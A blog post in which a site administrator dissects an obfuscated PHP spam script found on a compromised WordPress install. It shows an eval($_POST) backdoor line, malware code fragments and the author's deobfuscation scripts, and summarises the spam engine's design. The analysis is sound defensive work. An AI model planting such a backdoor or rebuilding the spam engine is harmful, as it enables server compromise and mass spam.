Dissecting a spammer’s spam script

Let’s take a look at a PHP script used to send spam. These types of scripts run on servers all over the world and might give you some insight into a spammer’s dedication to annoy the hell out of you.

Spammers abuse known flaws in unsecured websites and applications to break into a server and install scripts that are able to send loads of spam. This is one of the reasons why it’s hard to get rid of all spam: determining absolute trust in a sender is hard to achieve, since a fully hardened server can be a Swiss cheese a few zero-day exploits later.

Everyone running a mildly popular WordPress site knows that exploits can be really easily introduced by installing plugins from a less than reputable source – or by not keeping your plugins up to date. Sometimes, a zero-day exploit for a popular WordPress plugin is exposed and thousands of installations worldwide are infected instantly.

One of the WordPress sites on a shared hosting web server I manage was infected by a spam script. Fortunately, the script was unable to do any real damage and was detected within half an hour of infection. I thought it would be fun to show you the script and dissect it, to find out exactly how these things work and make thousands of email administrators’ lives a living hell.

Website infection

Infection of a website by a spammer is almost always performed by their botnet. The nodes coordinate attacks and will try to perform these three actions from different IP addresses:

  1. Abuse an exploit in order to install a minimal script: eval($_POST['input_from_spammer']);
  2. This script, usually edited into one of WordPress’ or plugin’s publically accessible PHP files, is executed many times with different inputs to install even more of these evaluation scripts
  3. Finally, when a website is compromised up to the point where fixing it manually is not really an option anymore, obfuscated hacking and spamming scripts are installed

Steps 1 and 2 are used to make sure the website remains compromised, even if an administrator decides to reinstall the website or restore a backup (without checking all the locations where the spammer had access to). Step 3 results in a few easily recognizable script files that perform the dirty work.

Why wouldn’t they just stop after step 1 and just inject the spam scripts through the eval() mechanism? My guess would be that to keep a low(er) profile, uploading a big script once and then just sending the necessary spamming information over in a minimal format is better when you’re trying to hide your actions.

Deobfuscating the spam script

Step 1: determine method of obfuscation

So let’s take a look at the unaltered, obfuscated script as it was found in the exploited installation of WordPress.

The first thing I noticed was that everything was squeezed onto one long messy line. The next obvious deduction is that some kind of transcoding is going on:

$GLOBALS['jihux92'] = $j10[86].$j10[62].$j10[86].$j10[64].$j10[73].$j10[27].$j10[19]; $GLOBALS['qsxte55'] = $j10[27].$j10[0].$j10[0].$j10[15].$j10[0].$j10[64].$j10[0].$j10[27].$j10[39].$j10[15].$j10[0].$j10[19].$j10[86].$j10[62].$j10[79]; $GLOBALS['eexet82'] = $j10[30].$j10[73].$j10[15].$j10[62].$j10[64].$j10[33].$j10[27].$j10[6].$j10[15].$j10[33].$j10[27]; $GLOBALS['cydwn23'] = $j10[93].$j10[92].$j10[93].$j10[33].$j10[12].$j10[87].$j10[87]; $GLOBALS['dmvah16'] = $j10[33].$j10[27].$j10[56].$j10[86].$j10[62].$j10[27];
// etcetera

My next steps would be to make this mess a bit more readable and try to reverse the transcoding used for pretty much everything.

Step 2: introduce newlines

I replace every semicolon with a semicolon followed by a newline. This gives me a better overview of some of the things that take place:

$GLOBALS['dmvah16'] = $j10[33].$j10[27].$j10[56].$j10[86].$j10[62].$j10[27];
$GLOBALS['uvmxr50'] = $j10[86].$j10[73].$j10[30].$j10[33].$j10[62].$j10[87].$j10[90];
$GLOBALS['oluxf50'] = $j10[54].$j10[57].$j10[16].$j10[54].$j10[86].$j10[50].$j10[80];
$GLOBALS['gyeof37'] = $j10[16].$j10[33].$j10[5];
$GLOBALS['frpwz79'] = $j10[6].$j10[15].$j10[57].$j10[62].$j10[19];
$GLOBALS['yguel83'] = $j10[19].$j10[86].$j10[16].$j10[27];
$GLOBALS['vrubd73'] = $j10[6].$j10[15].$j10[62].$j10[73].$j10[19].$j10[38].$j10[62].$j10[19];
$GLOBALS['cnftt27'] = $j10[16].$j10[52].$j10[33].$j10[19].$j10[61].$j10[55].$j10[53];
$GLOBALS['lfazz33'] = $j10[54].$j10[33].$j10[15].$j10[61].$j10[52].$j10[55].$j10[55];
$GLOBALS['haimq43'] = $j10[92].$j10[79].$j10[0].$j10[19].$j10[0].$j10[80];
$GLOBALS['xfeye26'] = $j10[86].$j10[16].$j10[39].$j10[75].$j10[15].$j10[33].$j10[27];
$GLOBALS['whzhh71'] = $j10[38].$j10[0].$j10[0].$j10[38].$j10[20].$j10[64].$j10[93].$j10[27].$j10[20].$j10[73];
$GLOBALS['bqdjr8'] = $j10[0].$j10[15].$j10[9].$j10[16].$j10[38].$j10[50].$j10[53];
$GLOBALS['uulbr4'] = $j10[16].$j10[15].$j10[86].$j10[30].$j10[93].$j10[90].$j10[87];
$GLOBALS['nqqaa78'] = $j10[27].$j10[93].$j10[75].$j10[7].$j10[20].$j10[90].$j10[90];
$GLOBALS['mdxuq1'] = $j10[0].$j10[61].$j10[54].$j10[62].$j10[7].$j10[53];

Some global assignments, probably used to share variables between function invocations without actually passing those variables as arguments. I discover two separate declarations of variables at the top of the script:

$pate="eyIubXguYW9sLm ...... hbSBwZXIiXX19fQ==";
$j10="rA;@{5cqVb/Fh<\"omGQtyHMZ`Y[eB&j] dO%W'ap-I!?1X\n^9L7Nx6z4fu}S*wn\r_=JU\t(E\\~s>lR.Kg3C)|:Ti8#\$20vkD+P,";

The two equals signs at the end of the $pate value look like base64 padding. The value of the $j10 variable looks completely random.

Step 3: replace the $j10 values

It looks like the variable $j10 is accessed a lot, and almost always in the context of string concatenation. This seems like a perfect candidate for some reverse transcoding! I ran the entire script through the decoder below:

$j10="rA;@{5cqVb/Fh<\"omGQtyHMZ`Y[eB&j] dO%W'ap-I!?1X\n^9L7Nx6z4fu}S*wn\r_=JU\t(E\\~s>lR.Kg3C)|:Ti8#\$20vkD+P,";

$data = file_get_contents($argv[1]);

for ($i = 0; $i < strlen($j10); ++$i) {
    $char = $j10[$i];
    $data = str_replace('$j10[' . $i . ']', '"' . addcslashes($char, "\r\n\"\\\t") . '"', $data);
}

echo $data;

That bit from step 2 now looks like this:

$GLOBALS['dmvah16'] = "d"."e"."f"."i"."n"."e";
$GLOBALS['uvmxr50'] = "i"."s"."j"."d"."n"."8"."2";
$GLOBALS['oluxf50'] = "z"."u"."m"."z"."i"."7"."3";
$GLOBALS['gyeof37'] = "m"."d"."5";
$GLOBALS['frpwz79'] = "c"."o"."u"."n"."t";
$GLOBALS['yguel83'] = "t"."i"."m"."e";
$GLOBALS['vrubd73'] = "c"."o"."n"."s"."t"."a"."n"."t";
$GLOBALS['cnftt27'] = "m"."x"."d"."t"."w"."4"."6";
$GLOBALS['lfazz33'] = "z"."d"."o"."w"."x"."4"."4";
$GLOBALS['haimq43'] = "v"."g"."r"."t"."r"."3";
$GLOBALS['xfeye26'] = "i"."m"."p"."l"."o"."d"."e";
$GLOBALS['whzhh71'] = "a"."r"."r"."a"."y"."_"."k"."e"."y"."s";
$GLOBALS['bqdjr8'] = "r"."o"."b"."m"."a"."7"."6";
$GLOBALS['uulbr4'] = "m"."o"."i"."j"."k"."2"."8";
$GLOBALS['nqqaa78'] = "e"."k"."l"."q"."y"."2"."2";
$GLOBALS['mdxuq1'] = "r"."w"."z"."n"."q"."6";

Success! Some of these are references to PHP functions, let’s see how they are being used in the rest of the script:

$GLOBALS['gyeof37'](0987654321)

// translates to:

"md5"(0987654321)

// which is the equivalent of:

md5(0987654321)

The spammers employ the use of PHP’s variable functions so they can hide which functions they call. They can do this for all function invocations, both user-defined and built-in functions. Some PHP code might look like function invocations, but are actually language constructs (such as isset() ):

if (!isset($vcmra37) || $vcmra37 == "") {

So I discover that not only did they hide their function invocations, they also obfuscated all variable names: $vcmra37 does not look like an intuitive name for a variable. I need to deal with both types of obfuscation in the next steps.

Step 4: concatenate constant strings

Because I’ve simply replaced all instances of $j10[…] with the corresponding value, the script now contains a lot of concatenations of constant strings. It’s time to simplify those with the following sed invocation:

sed -e 's/"\."//g' input-script.php > output-script.php

This misses a few edge cases, but after tiny fixes at lines 356, 472 and 519 I end up with a parseable PHP script. Let’s see how those $GLOBALS declarations look like now:

$GLOBALS['dmvah16'] = "define";
$GLOBALS['uvmxr50'] = "isjdn82";
$GLOBALS['oluxf50'] = "zumzi73";
$GLOBALS['gyeof37'] = "md5";
$GLOBALS['frpwz79'] = "count";
$GLOBALS['yguel83'] = "time";
$GLOBALS['vrubd73'] = "constant";
$GLOBALS['cnftt27'] = "mxdtw46";
$GLOBALS['lfazz33'] = "zdowx44";
$GLOBALS['haimq43'] = "vgrtr3";
$GLOBALS['xfeye26'] = "implode";
$GLOBALS['whzhh71'] = "array_keys";
$GLOBALS['bqdjr8'] = "robma76";
$GLOBALS['uulbr4'] = "moijk28";
$GLOBALS['nqqaa78'] = "eklqy22";
$GLOBALS['mdxuq1'] = "rwznq6";

Great! Suddenly, pieces of code are starting to make sense:

$uiwvy47["s_header"] = "Date: " . @$GLOBALS['xzfoh12']("D, j M Y G:i:s O")."\r\n";

I still need to deal with those pesky invocations on string values found in the $GLOBALS array. Let’s do that now.

Step 5: replace function invocations

I wrote a script to replace all $GLOBALS['foo'](...) invocations with their function equivalents, and at the same time remove the original $GLOBALS assignment:

$data = file_get_contents($argv[1]);

// Match all 'global' functions
$matches = [];
preg_match_all('#\\$GLOBALS\\[\'(.+?)\'\\] = "(.+?)";\\r\\n#', $data, $matches, PREG_SET_ORDER);

foreach ($matches as $match) {
    $obfuscatedName = $match[1];
    $actualName = $match[2];

    // Replace all function invocations
    $data = str_replace('$GLOBALS[\'' . $obfuscatedName . '\'](', $actualName . '(', $data);

    // Remove the obfuscation mapping
    $data = str_replace($match[0], '', $data);
}

echo $data;

So let’s see how the “xzfoh12” is doing after the spam script I have so far is pulled through the above decoder:

$uiwvy47["s_header"] = "Date: " . @date("D, j M Y G:i:s O")."\r\n";

Awesome! I now have a simple date(...) invocation. Pieces of code are starting to reveal their true nature:

// ...
case constant("SOCKET_TYPE_FSOCKET"): $jxykg73 = @fsockopen($hpzaj3."://".$urvjq67, $fgzke40, $bfwyd21, $iiwxg60, $zcxlk81);
if ($jxykg73 && $jlfho78) { @stream_set_blocking($jxykg73, 0);
} @stream_set_timeout($jxykg73, $zcxlk81);
break;
// ...

Step 6: prettify the PHP code

Since I got the feeling that I was getting close to understanding what the script does, I used an online PHP prettifier called the Spark Labs PHP Formatter to clean up the script I had up until now. This helps immensely with understanding the general structure of the code; the previous excerpt now looks like this:

// ...
        case constant("SOCKET_TYPE_FSOCKET"):
            $jxykg73 = @fsockopen($hpzaj3 . "://" . $urvjq67, $fgzke40, $bfwyd21, $iiwxg60, $zcxlk81);
            if ($jxykg73 && $jlfho78) {
                @stream_set_blocking($jxykg73, 0);
            }
            @stream_set_timeout($jxykg73, $zcxlk81);
            break;
// ...

Although function and variable names are still obfuscated, I begin to see what functions were designed to do based on the PHP built-in functions they call and the constant string and integer values they use. Take a look for yourself in the prettified script.

Step 7: remove default $j10 argument

Instead of making $j10 a global variable, the spammer decided to pass the value along with every invocation of the user-defined functions. A quick check reveals that $j10 is not used anymore, since I replaced all accesses to that variable in step 3. Alright, some sed magic to make all those parameters disappear:

sed -e 's/(\$j10, /(/g' input-script.php > output-script.php

Following this modification, I manually remove the $j10 assignment at the top of the script.

Step 8: decode the $pate payload

I decide that to understand what the code is doing, I need to be able to look inside the $pate payload at the top of the script. Let’s take a look at how it’s used:

$pate = "eyIubXguY...X19fQ==";

$lerqj48 = json_decode(kvkdh88($pate), TRUE);

function kvkdh88($xmxkd83) {
    $fupzm37 = "";
    for ($hvyut10 = 0; $hvyut10 < 256; $hvyut10++) {
        $gzccs73[$hvyut10] = chr($hvyut10);
    }
    $hgtxt70 = array_flip(preg_split("//", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/", -1, 1));
    $qmmlq58 = array();
    preg_match_all("([A-z0-9+\\/]{1,4})", $xmxkd83, $qmmlq58);
    foreach ($qmmlq58[0] as $iejib94) {
        $hzgqj17 = 0;
        for ($hvyut10 = 0; isset($iejib94[$hvyut10]); $hvyut10++) {
            $hzgqj17 = ($hzgqj17 << 6) + $hgtxt70[$iejib94[$hvyut10]];
            if ($hvyut10 > 0) {
                $fupzm37 .= $gzccs73[$hzgqj17 >> (4 - (2 * ($hvyut10 - 1)))];
                $hzgqj17 = $hzgqj17 & (0xf >> (2 * ($hvyut10 - 1)));
            }
        }
    }
    return $fupzm37;
}

So whatever comes out that kvkdh88 function must be a JSON string. Let’s see… that function applies a base64 character set, reads characters in blocks of at most 4 characters, some bit shifting going on… could this be a user-defined base64_decode()?

$pate = base64_decode("eyIubXguY...X19fQ==");
print_r($pate);

// output: '{".mx.aol.com":{...,"sr":["2 spam per"]}}}'

Yup, that’s it! I replace the $pate definition with the output I got and removed the kvkdh88 method altogether.

Step 9: replace $_POST references

At the top of the script, another simple obfuscation takes place:

$GLOBALS['xyzta42'] = ${"_POST"};

Let’s get rid of those:

$data = file_get_contents($argv[1]);

// Remove definition
$data = str_replace('$GLOBALS[\'xyzta42\'] = ${"_POST"};' . "\n", '', $data);

// Replace usage
$data = str_replace('$GLOBALS[\'xyzta42\']', '$_POST', $data);

echo $data;

Step 10: map function and variable names

After reading through the code I have now, I discover something really helpful: variable name obfuscation is the same throughout the script for the same variable names, i.e. all equivalent variable names were modified to the same obfuscated variable name. If I translate a single variable name correctly, it will probably be correct for the entire script!

So I started translating function names and variable names, starting with the simpler functions and working up to the larger ones with lots of variables and function invocations – probably used for the overall spam logic. I put them in a JSON mapping file:

{
    "functions": {
        "rcptw89": "base64_xor2_decode",
        "zdowx44": "base64_xor2_encode",
        "fclwp59": "base64_xor2_url_decode_from_post",
        "kdpdr2":  "connection_close",
// ... a lot more ...

        "imqjm17": "smtp_get_error",
        "qbzer79": "smtp_parse_error_response",
        "tvchy30": "smtp_read",
        "rcljy83": "smtp_write"
    },
    "variables": {
        "nbcnq11": "address",
        "jxwad57": "conn_idx",
        "uiwvy47": "connection_info",
        "docef75": "connections",
// ... a lot more ...

        "lzjwd61": "spam_config",
        "jxykg73": "sp",
        "hbxeq24": "successful",
        "zcxlk81": "timeout"
    }
}

Let’s use this mapping with a final decoder script:

$data = file_get_contents($argv[1]);
$mapping = json_decode(file_get_contents($argv[2]), true);

foreach ($mapping['functions'] as $obfuscated => $decoded) {
    $data = str_replace($obfuscated . '(', $decoded . '(', $data);
}

foreach ($mapping['variables'] as $obfuscated => $decoded) {
    $data = str_replace('$' . $obfuscated, '$' . $decoded, $data);
}

echo $data;

Take a look at the final deobfuscated script! Some variables remain untranslated but their intention is clear. This is probably close enough to what the spammer originally wrote.

So what does this spam script do?

Basically, the spam script does the following in order:

  1. Loads victim configuration passed by the spammer as POST variables to this script: spam_config_load(&$spam_config)
  2. For every victim address, initialize connection parameters
  3. Load retry time information from storage: retry_storage_read()
  4. Execute the main loop: spam_send_messages(&$connections, &$retry_time_storage, $hosts_info)
    1. Iterate over active connections and perform: connection_process(&$connections, &$retry_time_storage, $hosts_info)
    2. A state machine decides on the next action based on the connection’s current state
  5. Report the result of all spamming actions: spam_report($connections)
  6. Store retry information: retry_storage_write($retry_time_storage)

A number of things I think are noteworthy about this script:

  • The spammers are able to pass along not only the target email addresses of the victims, but also templates for things like the email’s body and subject.
  • Based on what was available in terms of PHP functionality, the script autodetects the best way to connect to an SMTP server:
  • The $pate data structure contains information about different SMTP hosts and the way they indicate grey- and blacklisting. If the script detects that the email was not outright rejected and a retry at some later point in time was in order, it stores this information per host in $retry_time_storage.
  • If socket_select() is available, the script maintains a number of simultaneous SMTP sessions and progresses them as soon as data is available to read.
  • The user-defined function dns_lookup($address) performs a custom written DNS lookup over UDP with the Google DNS (IP: 8.8.8.8) if PHP’s regular DNS functions are unavailable.
  • At certain points in the code a custom base64-plus-xor2 coding is applied. The ordinal values of bytes are XOR’ed with 2 before they are passed along to base64_encode(). My guess is that they did this so even if you found a value encoded this way, a simple base64_decode() would not be enough to reveal its contents.

Final thoughts

This is the first time I decoded a spammer’s script, and I’m slightly impressed by the technical quality. I would never have expected a state machine, or the amount of socket error codes that are handled gracefully. The custom written DNS lookup with a proper response handling loop also surprised me. Someone was very seriously trying to spam people.

My question for you: can you find the source of this evil? Let me know!